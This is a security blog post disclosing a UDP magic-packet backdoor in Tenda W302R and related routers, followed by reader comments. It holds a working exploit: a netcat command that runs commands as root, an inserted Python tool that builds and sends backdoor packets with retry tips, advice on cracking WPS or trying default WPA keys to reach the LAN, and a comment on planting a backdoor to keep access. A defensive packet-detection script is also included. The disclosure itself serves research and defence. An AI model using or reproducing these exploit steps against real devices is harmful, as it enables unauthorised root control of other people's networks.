From China, With Love

Lest anyone think that D-Link is the only vendor who puts backdoors in their products, here’s one that can be exploited with a single UDP packet, courtesy of Tenda.

After extracting the latest firmware for Tenda’s W302R wireless router, I started looking at /bin/httpd, which turned out to be the GoAhead webserver:

Server header string in /bin/httpd

But Tenda has made a lot of special modifications themselves. Just before entering the HTTP receive loop, main calls InitMfgTask, which spawns the MfgThread function as a separate thread:

pthread_create(&var_10, 0, MfgThread, 0);

Hmmm…InitMfgTask and MfgThread? Related to manufacturing tasks perhaps? Iiiiiinteresting…

The first thing MfgThread does is create a UDP socket and bind it to port 7329:

Create UDP socket and bind to port 7329

The thread then goes into a recvfrom loop, reading up to 128 bytes from the socket. It expects each received UDP packet to be at least 14 bytes in length:

Read packet from socket and check packet size

Now for the fun part; the received UDP packet is then parsed by this block of code:

Processing the received packet

In C, this code reads:

memset(rx_magic_string, 0, 0x80);
memset(command_byte, 0, 0x80);
memset(command_arg, 0, 0x80);

memcpy(rx_magic_string, rx_buf, 9);
command_byte[0] = rx_buf[11];
memcpy(command_arg, rx_buf+12, rx_size-12);

// If magic string doesn't match, stop processing this packet and wait for another packet
if(strcmp(rx_magic_string, "w302r_mfg") != 0) goto outer_receive_loop;

We can see that the thread is expecting a packet with the following structure:

struct command_packet_t
{
    char magic[10]; // 9 byte magic string ("w302r_mfg"), plus a NULL terminating byte
    char command_byte;
    char command_arg[117];
};

One caveat: in this struct the command byte sits at offset 10 and the argument starts at offset 11, whereas the parsing code above reads the command byte from rx_buf[11] and copies the argument from rx_buf+12, leaving offsets 9 and 10 unused. The strcmp only ever looks at the first 9 bytes, so if a device ignores a packet built one way, try the other layout before concluding that the listener is absent.

As long as the received packet starts with the string “w302r_mfg”, the code then compares the specified command byte against three ASCII characters (’1′, ‘x’, and ‘e’):

Comparing command_byte to '1', 'x' and 'e'

For simplicity, I’ve converted the remaining disassembly (at least the important bits) to the following C code:

switch(command_byte)
{
    case 'e':
        // Ping test: echo the magic string back to the sender
        strcpy(tx_buf, "w302r_mfg");
        tx_size = 9;
        break;
    case '1':
        // Only a substring check: any argument containing "iwpriv" reaches the shell
        if(strstr(command_arg, "iwpriv") != NULL)
        {
            tx_size = call_shell(command_arg, tx_buf, 0x800);
        }
        else
        {
            strcpy(tx_buf, "000000");
            tx_size = strlen(tx_buf);
        }
        break;
    case 'x':
        // No check at all: the argument goes straight to popen() as root
        tx_size = call_shell(command_arg, tx_buf, 0x800);
        break;
    default:
        goto outer_receive_loop;
}

// Reply to whoever sent the packet (flags = 0, 16 == sizeof(struct sockaddr_in))
sendto(client_socket, tx_buf, tx_size, 0, (struct sockaddr *)&client_sock_addr, 16);
goto outer_receive_loop;

The following actions correspond to the three accepted command bytes:

  • ‘e’ – Responds with a pre-defined string, basically a ping test
  • ’1′ – Intended to allow you to run iwpriv commands; note that the only check is strstr(command_arg, "iwpriv"), so any argument that merely contains that substring is handed to call_shell
  • ‘x’ – Allows you to run any command, as root

If ‘x’ is specified as the command byte, the remainder of the packet after the command byte (called command_arg in the above code) is passed to call_shell, which executes the command via popen:

popen(command_arg, "r");

What’s more, call_shell populates the tx_buf buffer with the output from the command, which, as we can see from the previous C code, is sent back to the client!

Knowing the functionality of MfgThread and its expected packet structure, we can easily exercise this backdoor with netcat:

$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329
drwxr-xr-x    2 0        0            1363 webroot
drwxr-xr-x    1 0        0               0 var
drwxr-xr-x    5 0        0              43 usr
drwxr-xr-x    1 0        0               0 tmp
drwxr-xr-x    2 0        0               3 sys
drwxr-xr-x    2 0        0             569 sbin
dr-xr-xr-x   39 0        0               0 proc
drwxr-xr-x    2 0        0               3 mnt
drwxr-xr-x    1 0        0               0 media
drwxr-xr-x    4 0        0             821 lib
lrwxrwxrwx    1 0        0              11 init -> bin/busybox
drwxr-xr-x    2 0        0               3 home
drwxr-xr-x    7 0        0             154 etc_ro
drwxr-xr-x    1 0        0               0 etc
drwxr-xr-x    1 0        0               0 dev
drwxr-xr-x    2 1000     100           574 bin
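The packet format worked out above and the netcat probe, scripted as an added example (editor-supplied Python, not code from the post or from Tenda): build_mfg_packet() assembles a datagram, parse_mfg_packet() is a model of MfgThread's dispatch reconstructed from the C above and returns what the thread would do without executing anything, and probe() sends one datagram to UDP/7329 and returns the reply. The model follows the decompiled offsets (command byte at 11, argument from 12); because the struct and the netcat line put them at 10 and 11, the builder takes cmd_offset as a parameter and the command-line entry point tries both layouts. The router address 192.168.0.1 is taken from the netcat example and the script name mfg_probe.py is assumed.

```python
import socket
from typing import Optional, Tuple

MAGIC = b"w302r_mfg"
MFG_PORT = 7329
MIN_LEN, MAX_LEN = 14, 128   # minimum accepted size and the recvfrom() read size
TX_BUF = 0x800               # size of the reply buffer handed to call_shell()

# The decompiled parsing code reads the command byte at rx_buf[11] and the
# argument from rx_buf+12; the struct and the netcat line in the post use 10
# and 11. The parser model follows the decompiled code; the builder takes the
# offset as a parameter so both layouts can be tried against real hardware.
CMD_OFFSET = 11


def build_mfg_packet(cmd_byte: bytes, arg: bytes = b"", cmd_offset: int = CMD_OFFSET) -> bytes:
    """Assemble one command datagram: magic, NUL padding, command byte, argument."""
    if len(cmd_byte) != 1:
        raise ValueError("command byte must be exactly one byte")
    if cmd_offset < len(MAGIC) + 1:
        raise ValueError("command byte would clobber the magic or its terminator")
    pkt = MAGIC + b"\x00" * (cmd_offset - len(MAGIC)) + cmd_byte + arg
    # Packets shorter than 14 bytes are dropped, so pad the tail with NULs; the
    # argument is used as a C string on the device, so trailing NULs are harmless.
    pkt += b"\x00" * max(0, MIN_LEN - len(pkt))
    if len(pkt) > MAX_LEN:
        raise ValueError("argument too long: the thread reads at most 128 bytes")
    return pkt


def parse_mfg_packet(data: bytes) -> Optional[Tuple[str, bytes]]:
    """Model of MfgThread's dispatch as reconstructed in the post (nothing is executed).

    Returns None where the thread would go back to its receive loop, otherwise
    (action, detail): action is "ping", "reply" or "shell", and for "shell" the
    detail is the exact string that would reach popen() as root.
    """
    rx = data[:MAX_LEN]                          # recvfrom(sock, rx_buf, 128, ...)
    if len(rx) < MIN_LEN:                        # size check before parsing
        return None
    rx_magic = rx[:9]                            # memcpy(rx_magic_string, rx_buf, 9)
    command_byte = rx[11:12]                     # command_byte[0] = rx_buf[11]
    # memcpy(command_arg, rx_buf+12, rx_size-12) into a zeroed 0x80-byte buffer,
    # later used as a C string, so it ends at the first NUL.
    command_arg = rx[12:].split(b"\x00", 1)[0]
    if rx_magic != MAGIC:                        # strcmp(rx_magic_string, "w302r_mfg")
        return None
    if command_byte == b"e":
        return ("ping", MAGIC)                   # echoes the magic, tx_size = 9
    if command_byte == b"1":
        if b"iwpriv" in command_arg:             # strstr(): a substring check only
            return ("shell", command_arg)
        return ("reply", b"000000")
    if command_byte == b"x":
        return ("shell", command_arg)            # popen(command_arg, "r")
    return None                                  # default: outer_receive_loop


def probe(host: str, cmd_byte: bytes = b"e", arg: bytes = b"",
          cmd_offset: int = CMD_OFFSET, timeout: float = 3.0) -> Optional[bytes]:
    """Send one datagram to UDP/7329 and return the reply, or None on timeout.

    Start with the 'e' ping: a device that answers with the magic string has the
    listener, and nothing has been executed on it yet.
    """
    pkt = build_mfg_packet(cmd_byte, arg, cmd_offset)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(pkt, (host, MFG_PORT))
        try:
            reply, _ = sock.recvfrom(TX_BUF)
        except socket.timeout:
            return None
    return reply


if __name__ == "__main__":
    import sys
    # Usage: python mfg_probe.py 192.168.0.1 [x /bin/ls]   (router address assumed)
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.0.1"
    cmd = sys.argv[2].encode() if len(sys.argv) > 2 else b"e"
    argument = sys.argv[3].encode() if len(sys.argv) > 3 else b""
    for off in (11, 10):   # decompiled layout first, then the struct/netcat layout
        answer = probe(target, cmd, argument, cmd_offset=off)
        print(f"offset {off}: {answer!r}")
        if answer is not None:
            break
```

A reply of w302r_mfg to the 'e' ping is the non-destructive confirmation that a device runs this listener; the 'x' path is only worth sending after that. The parser model is also what you would run a fuzzer or a capture against when checking whether a packet built for another layout would be accepted.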

One teensy-weensy, but ever so crucial little tiny detail is that the backdoor only listens on the LAN, thus it is not exploitable from the WAN. However, it is exploitable over the wireless network, which has WPS enabled by default with no brute force rate limiting. My shiny new ReaverPro box made relatively short work of cracking WPS, providing access to the WLAN and a subsequent root shell on the router (they also ship with a default WPA key, which you might want to try first):

ReaverPro cracking the WPS pin

Starting telnetd and getting a root shell

As the magic string suggests, this backdoor was likely first implemented in Tenda’s W302R router, although it also exists in the Tenda W330R, as well as re-branded models, such as the Medialink MWN-WAPR150N. They all use the same “w302r_mfg” magic packet string.
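For the defensive side, an added detection example (editor-supplied Python, not from the post): given UDP datagrams as (src, dst, sport, dport, payload) tuples such as you would pull from a capture of the LAN or WLAN segment, it flags anything sent to UDP/7329 whose payload begins with an _mfg magic, and classifies 'x' and '1' as command execution and everything else as a probe. Matching any short token ending in _mfg, rather than only w302r_mfg, is an assumption made so that the rlink_mfg variant mentioned in the comments below and the other model strings in ea's follow-up are caught as well; the sample datagrams are constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

MFG_PORT = 7329
# The post's magic is "w302r_mfg"; a comment below reports "rlink_mfg" in the leaked
# source and ea's follow-up lists other <model>_mfg strings. Matching the family
# (a short lowercase token ending in "_mfg") rather than one string is an assumption.
MAGIC_RE = re.compile(rb"^[a-z0-9]{1,8}_mfg")

# (src, dst, sport, dport, payload), as decoded from a capture; constructed here.
Datagram = Tuple[str, str, int, int, bytes]


def inspect_mfg_datagram(payload: bytes) -> Optional[Dict[str, object]]:
    """Describe a manufacturing-backdoor command, or return None for other traffic."""
    m = MAGIC_RE.match(payload)
    if m is None:
        return None
    magic = m.group(0)
    # Skip the NUL padding after the magic, which tolerates the command byte sitting
    # at offset 10 (struct/netcat line in the post) or 11 (decompiled C); this is an
    # alerting heuristic, not the device's own parsing.
    tail = payload[len(magic):].lstrip(b"\x00")
    cmd = tail[:1]
    arg = tail[1:].split(b"\x00", 1)[0]
    severity = "command-execution" if cmd in (b"x", b"1") else "probe"
    return {"magic": magic, "cmd": cmd, "arg": arg, "severity": severity}


def scan(datagrams: List[Datagram]) -> List[Dict[str, object]]:
    """Flag every datagram to UDP/7329 that carries an _mfg magic string."""
    alerts: List[Dict[str, object]] = []
    for src, dst, sport, dport, payload in datagrams:
        if dport != MFG_PORT:
            continue
        hit = inspect_mfg_datagram(payload)
        if hit is not None:
            alerts.append({"src": src, "dst": dst, "sport": sport, **hit})
    return alerts


# Constructed sample capture: two benign datagrams and three backdoor commands.
SAMPLE_DATAGRAMS: List[Datagram] = [
    ("192.168.0.23", "8.8.8.8", 51000, 53, b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"),
    ("192.168.0.23", "192.168.0.1", 51001, 7329, b"hello router, not a magic"),
    ("192.168.0.77", "192.168.0.1", 40000, 7329, b"w302r_mfg\x00x/bin/ls"),
    ("192.168.0.77", "192.168.0.1", 40001, 7329, b"w302r_mfg\x00\x001iwpriv ra0 stat"),
    ("192.168.0.90", "192.168.0.1", 40002, 7329, b"rlink_mfg\x00\x00e\x00\x00"),
]


def format_alerts(alerts: List[Dict[str, object]]) -> List[str]:
    """One human-readable line per alert, for a console or a log shipper."""
    lines = []
    for a in alerts:
        lines.append(
            f'{a["severity"]:<17} {a["src"]} -> {a["dst"]} '
            f'magic={a["magic"].decode()} cmd={a["cmd"].decode(errors="replace")!r} arg={a["arg"]!r}'
        )
    return lines


if __name__ == "__main__":
    print("\n".join(format_alerts(scan(SAMPLE_DATAGRAMS))))
```

Because the listener only binds on the LAN side, any hit at all means a host already on the wired or wireless segment is talking to it; that, rather than the source address, is the thing to chase.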

UPDATE:

ea did a great job of grepping through various Tenda firmwares to find a lot more routers that are likely affected: http://ea.github.io/blog/2013/10/18/tenda-backdoor/


92 Responses to From China, With Love

  1. virusdefender says:

    it’s mysterious…

  2. monky says:

    Chinese device has backdoor in router. wow… amazing!!!!

  3. Pingback: Tenda router backdoor? | USA is China

  4. cong ty luat says:

    from china with love. :V

    • craig is a born again as$h0le says:

      from usa, with hate/slander/politically motivated highly biased bullshit articles. first of all, you still need to crack the wps pwd, so how the fuck is this a backdoor. second, this is the second time you’ve only targeted any hardware that is even remotely related to china. the first was d-link (actually taiwan based). there are hundreds of routers out there with exploits, nice to know you only narrow your selection based on some seedy agenda.

  5. Preston says:

    Some how, the source of this GoAhead was on github:

    https://github.com/socoola/yhrouter/blob/master/user/goahead/src/goahead.c

    Github record shows the repo was committed to github a year ago. It shows very clearly how the backdoor “MfgThread” works.

    I’ve no idea where the source comes from, maybe leaked from an engineer? I guess Tenda doesn’t intend to open-source their firmware.

    • Craig says:

      Yeah, I saw that too (after I RE’d the firmware of course :P). It’s common for vendors to not release the source to any of their custom/customized binaries, even if they have a GPL release; it isn’t clear why the code got uploaded to github though.

  6. Jobs says:

    WHAT THE CHINESE ROUTERS !!!
    I’m using a f*** Tenda wireless access point…

    • Craig says:

      Well the good news is that the backdoor only listens on the LAN, so as long as you don’t have any untrusted users on your network and you disable WPS and use a strong WPA passphrase, you should be relatively safe.

    • Chinese Guy says:

      Are you telling me they will go near your house, check if your WPS is on, and sit there for several hours to crack the password just to spy on your unencrypted connections? Scaring your ISP to hand over your data is definitely more effective. This kind of obvious backdoor is more like the work of a newbie programmer who is cheap to hire, and wanted to test the firmware but forgot to remove it when releasing the firmware.

      • Craig says:

        I doubt this was a forgotten backdoor (though almost certainly the developers of these devices are newbies/cheap hires). Based on the function names alone this appears to be put in place intentionally for testing/debugging during manufacturing.

  7. ea says:

    Nice find, I grepped through the different firmwares on the Tenda website : http://ea.github.io/blog/2013/10/18/tenda-backdoor/

  8. Veronique says:

    F** China device !

  9. Pingback: Another backdoor in routers – a magic UDP packet is enough | Zaufana Trzecia Strona

  10. Benny says:

    Great work, congratulations to your success! :)

  11. Pingback: NeoAtlantis/NERV | [Repost] Tenda router backdoor gives root access

  12. Jack says:

    Well, We should boycott chinese devices immediately!

  13. shadowlips says:

    I think non-open-source devices are more dangerous nowadays, like Huawei routers and switches, ZTE devices; we can’t imagine it……

  14. Pingback: .:[ d4 n3wS ]:. » Tenda: a backdoor in Chinese routers

  15. Ahmed says:

    I’m just curious, what software are you using to do all this amazing reverse engineering stuff?

  16. Somd5.com says:

    Hello,somd5.com ~~~~~Seeking testing

  17. Ahmed says:

    This doesn’t work on MWN-WAPR150N router. I’ve just tested it.

    • Craig says:

      Is it an MWN-WAPR150N or an MWN-WAPR150Nv2? The firmware for the MWN-WAPR150Nv2 is radically different and does not contain this backdoor. I have confirmed that the latest firmware for the MWN-WAPR150N (v11.8 at the time of this writing) does in fact have this same backdoor.

  18. HD Moore says:

    The GitHub source linked by Preston uses a different magic string. This may be even more common, with different magics for each vendor:

    if (strcmp(FlagBuf,”rlink_mfg”) != 0) {

    • Craig says:

      Interesting; I know that at least the W330R uses a Ralink chipset. It wouldn’t surprise me if this is code supplied by Ralink to vendors and Tenda just changed the magic string to their device’s model number.

  19. Pingback: Backdoor Found In D-Link Consumer Routers

  20. Pingback: A backdoor activated by a UDP packet has been found in Tenda and Medialink wireless routers | AllUNIX.ru - the all-Russian portal on UNIX systems

  21. Pingback: From China, With Love | Rocketboom

  22. Eric Wang says:

    In China, I think TP-Link is much better than D-Link and Tenda,
    Tenda is just rubbish, it’s not easy to use,
    TP-Link is much easier to use, but I am not sure whether it has a backdoor.

  23. muc in says:

    WHAT THE CHINESE ROUTERS
    I’m using a TP-Link wireless access point

  24. Pingback: Backdoor in Chinese Tenda routers

  25. Pingback: Tenda router backdoor, From China, With Love! | Betula’s Blog

  26. NoArmsNoLegsInOcean says:

    I keep my key under the mat in the backyard.

  27. Criação says:

    Hi Craig… really nice work indeed. I envy your skills…
    One question: Are you able to use that 64-character-long WPA PSK key you got with Reaver? This is something that I was unable to solve in most cases.

    • Craig says:

      I don’t know if all affected devices do this, but the one I tested did give back a random 64 character key instead of the actual WPA key currently in use. The new Reaver has an option to disable wireless encryption once you know the WPS pin, which is what I used to get into the wireless network. It isn’t ideal, but most people would just think it was the router being buggy anyway, and even if they put another WPA key in place, uploading a backdoor to the router would let you keep access to the network.

  28. iddlebit says:

    Now might be a good time to mention OpenWRT

  29. Sally Zhang says:

    Does this router have the backdoor?
    No product seems to be safe now!
    Telemax

  30. Pingback: How to prevent a UDP-based channel from turning into a "backdoor"? | CopyQuery

  31. Pingback: Root access backdoor discovered in Chinese Tenda Wireless Routers

  32. Pingback: Approaching Science: From China, With Love – analysis of the Tenda router backdoor | Panni_007 Security

  33. Pingback: Backdoor Found In Tenda Router Firmware | Mocana DeviceLine Blog

  34. ALIEN360 says:

    Hello, respect for the article. I can confirm that this backdoor doesn’t work on W316R, I had tried with 3 firmware versions, and with using both w302r_mfg and w316r_mfg, maybe there are different strings for all models.

  35. Pingback: D-Link hole-prober finds 'backdoor' in Chinese wireless routers | Techbait Tech News

  36. Pingback: ste williams – D-Link hole-prober finds ‘backdoor’ in Chinese wireless routers

  37. Pingback: Tenda keeps D-Link Company | The Security Shelf

  38. Pingback: From China with love | Tibetan I Tech

  39. mz2010@foxmail.com says:

    In China, Tenda is just an ordinary product; of course I would like to buy the M3000R. For people using Tenda, as long as the wireless key is complex enough you are completely safe. American friends, you never make cheap products, so very few people tinker with your products. As far as security goes, compared with what the righteous Snowden exposed, the Tenda problem is a drop in the bucket for us. Perhaps you could look at whether products in the same price range as America’s Netgear have vulnerabilities.

    If you boycott Chinese products your cost of living will increase explosively. Daily necessities basically all come from China.

    ——- From China
    Feel free to talk by email.

    • Hang says:

      It is interesting that the low price of Chinese products is an excuse for the backdoor. The backdoor is an ethical issue rather than a cost issue. Is the last paragraph a threat? Do you think it works?

      This is really a unique way of reasoning of Chinese Communists.

      (In Chinese:) Blaming this kind of backdoor vulnerability on the low price of Chinese products is interesting indeed, but really this is about ethics more than cost. Besides, does the last paragraph count as a threat?

      The Chinese Communist Party’s way of thinking is indeed unique.

      • mz2010@foxmail.com says:

        If you use a knock-off phone and expect it to perform like an iPhone, that is impossible. What I actually mean is that Tenda, being a low-priced product, did not study its firmware properly; that is undeniably Tenda’s fault, but I see it as: cheap goods are toys -_-! I think our ways of thinking differ a lot. For example: this Tenda is insecure, so you demand that Tenda replace the product! Whereas for me, if it works, it works; if it is really insecure, I just buy another one myself.

        Also, you ask whether the last paragraph counts as a threat? I said that because I saw someone say to boycott Chinese products! Consider it me educating them a little. I just want to say: you are welcome to boycott Chinese products! Heh heh!

        Also, I don’t know whether talking about government issues here would be illegal, but there is one thing to remember: Chinese people do not depend on the government to live! Completely different from the US.

        Finally: you are using traditional Chinese characters; I can read them but cannot write them. I suggest using simplified characters. Traditional characters are still used in Hong Kong at present.

  40. Pingback: Rotten routers? More brands found to contain hidden “backdoors” – Information security alerts and news

  41. Pingback: Router vulnerabilities: now also at Netgear and Tenda - Nerd-Supreme

  42. Pingback: IT Secure Site » Blog Archive » Rotten routers? More brands found to contain hidden “backdoors”

  43. Pingback: Tenda Wireless Routers Feature Backdoor | HOTforSecurity

  44. Pingback: Chinese Tenda routers harbour a backdoor vulnerability | Network Security and Privacy

  45. Pingback: Repost: Chinese Tenda routers harbour a backdoor vulnerability

  46. zucchini says:

    I have been having trouble unsquashing this filesystem…
    “SYNTAX: /usr/local/bin/unsquashfs [options] filesystem
    …helpinfo…
    Decompressors available:
    gzip
    lzo
    xz”

  47. Pingback: One Ping Only | TechSNAP 133 | Jupiter Broadcasting

  48. DS says:

    Worked on my Zonet/Tenda router(s). Only thing I found is that the telnetd actually asks for a username/password which I can’t find.

  49. Matrong says:

    Actually, Tenda just fixed it by uploading new patches. Gotta say, I kind of like Tenda, I’ve been using Tenda since 2009, got some issues on setup but great price and reliable, my W307R still works like a charm. I believe there are lots of folks like me who just do not care about the brand that much, but I ain’t letting someone just talk trash about the brand I like just like that.

    Here is the link to their explanation:
    http://www.tendacn.com/tendacn/Commany/show.aspx?articleid=2344

  50. Pingback: Tenda router backdoor, From China, With Love! | sky'自留地

  51. Pingback: Security News #0×56 | CyberOperations

  52. Pingback: Tenda wireless router remote command execution backdoor vulnerability | Product Manager Commune

  53. Pingback: Chinese Tenda routers harbour a backdoor vulnerability | Network Security and Privacy

  54. Pingback: ste williams – Tenda seals shut router backdoor found by D-Link hole-prober

  55. Pingback: Tenda seals shut router backdoor found by D-Link hole-prober | Techbait Tech News

  56. Pingback: Liquidmatrix Security Digest Podcast - Episode 34 - Liquidmatrix Security Digest Liquidmatrix Security Digest

  57. Pingback: Analysis of the Tenda router backdoor

  58. Pingback: PrimalSec Podcast Episode #3 ← Primal Security Podcast

  59. Pingback: How I found a vulnerability in Tenda router firmware | 天天三国杀

  60. Pingback: Root access backdoor discovered in Chinese Tenda Wireless Routers | Cyber Defense Magazine

  61. Pingback: Backdoor found in Chinese Tenda Wireless Routers, allows Root access to Hackers | My great WordPress blog

  62. Pingback: Intrusio Router backdoor reloaded…
